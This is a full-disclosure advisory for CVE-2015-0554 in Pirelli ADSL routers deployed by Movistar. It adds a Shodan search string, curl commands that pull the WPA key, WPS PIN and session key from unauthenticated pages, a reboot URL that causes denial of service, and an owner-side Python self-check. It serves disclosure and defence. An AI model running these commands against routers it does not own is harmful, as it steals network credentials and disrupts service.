- Title:
CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure
HomeStation Movistar
- Author:
Eduardo Novella (@enovella_)
ednolo[@]inf.upv[dot]es
- Version:
Tested on firmware version PDG_TEF_SP_4.06L.6
- Shodan dork:
+ "Dropbear 0.46 country:es" (this dork no longer appears to return results)
- Summary:
Movistar's HomeStation service has deployed routers manufactured by Pirelli. The web interface of these routers serves its HTML pages to any
public IP address on the Internet, with neither authentication nor any other protection against unauthorized extraction of sensitive information.
- The vulnerability and the way to exploit it:
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
<option value='0'>WLAN_DEAD</option>
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin= '12820078';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
var sessionKey='1189641421';
$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
<td width="50">BSSID:</td>
<td>
DC:0B:1A:XX:XX:XX
</td>
# Rebooting the router remotely and provoking a Denial of Service
#-----------------------------------------------------------------
http://${IP_ADDRESS}/resetrouter.html
In the page source we can observe:
<!-- hide
var sessionKey='846930886';
function btnReset() {
var loc = 'rebootinfo.cgi?';
loc += 'sessionKey=' + sessionKey;
var code = 'location="' + loc + '"';
eval(code);
}
// done hiding -->
http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123
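The two sections above hinge on the same defect: wlsecurity.html and resetrouter.html are served without authentication, and the sessionKey embedded in them is the only token rebootinfo.cgi checks. The following self-check script is an added example and is not part of the original advisory; it parses a page the same way the curl | grep commands do, but from the owner's side, so that running it against your own router's LAN address tells you whether the device still exposes these values or whether the firmware update / login redirect is in place. The HTML sample and all values in it are constructed placeholders, not data from any real device, and the function names are my own.

```python
"""Self-check for the unauthenticated disclosure on wlsecurity.html.

Added example (not the advisory's own code). Run it against your OWN gateway
address; a 'protected' verdict means the page now demands a login.
"""
import re
import sys
import urllib.error
import urllib.request

# JavaScript variables that the advisory shows being served to unauthenticated
# clients. sessionKey is also the token that rebootinfo.cgi expects.
SENSITIVE_VARS = ("wpaPskKey", "WscDevPin", "sessionKey")

# Matches JS assignments such as  var wpaPskKey = 'value';  (spacing/quotes vary)
_ASSIGN_RE = re.compile(r"var\s+(\w+)\s*=\s*['\"]([^'\"]*)['\"]")


def find_leaked_vars(html: str) -> dict:
    """Return {name: value} for every sensitive JS variable present in the page."""
    return {name: value for name, value in _ASSIGN_RE.findall(html)
            if name in SENSITIVE_VARS}


def assess_response(status: int, html: str) -> str:
    """Classify one unauthenticated HTTP response to wlsecurity.html.

    'exposed'   : page delivered (200) and it carries secrets  -> still vulnerable
    'protected' : auth demanded or redirected to a login page  -> fixed
    'unknown'   : anything else (e.g. 200 without secrets, 404)
    """
    if status in (301, 302, 401, 403):
        return "protected"
    if status == 200 and find_leaked_vars(html):
        return "exposed"
    return "unknown"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx; returning None makes urlopen raise HTTPError with that code,
    so a redirect to a login page is reported as 'protected' rather than as 200."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url: str, timeout: float = 5.0) -> tuple:
    """GET url without credentials; return (status, body). Live check only."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""


# Constructed sample resembling the page source quoted above (placeholder values).
SAMPLE_HTML = """
<html><head><script>
<!-- hide
var wpaPskKey = 'PLACEHOLDER_PSK_VALUE';
var WscDevPin= '00000000';
var sessionKey='123456789';
// done hiding -->
</script></head></html>
"""

if __name__ == "__main__":
    # Usage: python check_router.py 192.168.1.1   (your own gateway address)
    if len(sys.argv) != 2:
        print("usage: check_router.py <router-ip>")
        sys.exit(2)
    status, body = fetch(f"http://{sys.argv[1]}/wlsecurity.html")
    print(f"HTTP {status}: {assess_response(status, body)}")
    for name in find_leaked_vars(body):
        print(f"  exposed variable: {name}")  # names only; never echo the values
```

The script prints only the names of the exposed variables, not their values, so its output can be pasted into a ticket without leaking the WPA key a second time. A 200 response that carries none of the three variables is reported as unknown rather than protected, because it may simply be a different page layout.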
# All the files that can be fetched from the web root.
#----------------------------------------------
webs$ ls
adslcfgadv.html       diagpppoe.html      ipv6lancfg.html     qoscls.html              statsatmreset.html
adslcfgc.html         dlnacfg.html        js                  qosqmgmt.html            statsifc.html
adslcfg.html          dnscfg.html         jsps                qosqueueadd.html         statsifcreset.html
adslcfgtone.html      dnsproxycfg.html    lancfg2.html        qsmain.html              statsmocalanreset.html
algcfg.html           dsladderr.html      languages           quicksetuperr.html       statsmocareset.html
APIS                  dslbondingcfg.html  lockerror.html      quicksetup.html          statsmocawanreset.html
atmdelerr.html        enblbridge.html     logconfig.html      quicksetuptesterr.html   statsvdsl.html
backupsettings.html   enblservice.html    logintro.html       quicksetuptestsucc.html  statsvdslreset.html
berrun.html           engdebug.html       logobkg.gif         rebootinfo.html          statswanreset.html
berstart.html         ethadderr.html      logoc.gif           resetrouter.html         statsxtmreset.html
berstop.html          ethdelerr.html      logo_corp.gif       restoreinfo.html         storageusraccadd.html
certadd.html          footer.html         logo.html           routeadd.html            stylemain.css
certcaimport.html     hlpadslsync.html    logomenu.gif        rtdefaultcfgerr.html     threeGPIN.html
certimport.html       hlpatmetoe.html     main.html           rtdefaultcfg.html        todadd.html
certloadsigned.html   hlpatmseg.html      menuBcm.js          scdmz.html               tr69cfg.html
cfgatm.html           hlpethconn.html     menu.html           scinflt.html             updatesettings.html
cfgeth.html           hlppngdns.html      menuTitle.js        scmacflt.html            upload.html
cfgl2tpac.html        hlppnggw.html       menuTree.js         scmacpolicy.html         uploadinfo.html
cfgmoca.html          hlppppoasess.html   mocacfg.html        scoutflt.html            upnpcfg.html
cfgptm.html           hlppppoeauth.html   multicast.html      scprttrg.html            url_add.html
colors.css            hlppppoeconn.html   natcfg2.html        scripts                  util.js
config.json.txt       hlppppoeip.html     ntwksum2.html       scvrtsrv.html            wanadderr.html
css                   hlptstdns.html      omcidownload.html   seclogintro.html         wancfg.html
ddnsadd.html          hlpusbconn.html     omcisystem.html     snmpconfig.html          wlcfgadv.html
defaultsettings.html  hlpwlconn.html      password.html       sntpcfg.html             wlcfg.html
dhcpinfo.html         html                portmapadd.html     standby.html             wlcfgkey.html
diag8021ag.html       ifcdns.html         portmapedit.html    StaticIpAdd.html         wlmacflt.html
diagbr.html           ifcgateway.html     portName.js         StaticIpErr.html         wlrefresh.html
diag.html             images              pppoe.html          statsadslerr.html        wlsecurity.html
diagipow.html         index.html          pradd.html          statsadsl.html           wlsetup.html
diaglan.html          info.html           ptmadderr.html      statsadslreset.html      wlwapias.html
diagmer.html          ipoacfg.html        ptmdelerr.html      statsatmerr.html         xdslcfg.html
diagpppoa.html        ippcfg.html         pwrmngt.html        statsatm.html
+ Conclusion:
This vulnerability can be exploited remotely and should be patched as soon as possible. An attacker could monitor our network
or, even worse, turn the router into a member of a botnet without our knowledge.
A first mitigation is either to update these routers to the latest firmware version or to install a third-party firmware such as OpenWRT or DD-WRT on them.
+ References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html
+ Timeline:
2013-04-xx Email sent to Movistar and Pirelli
2015-01-05 Full disclosure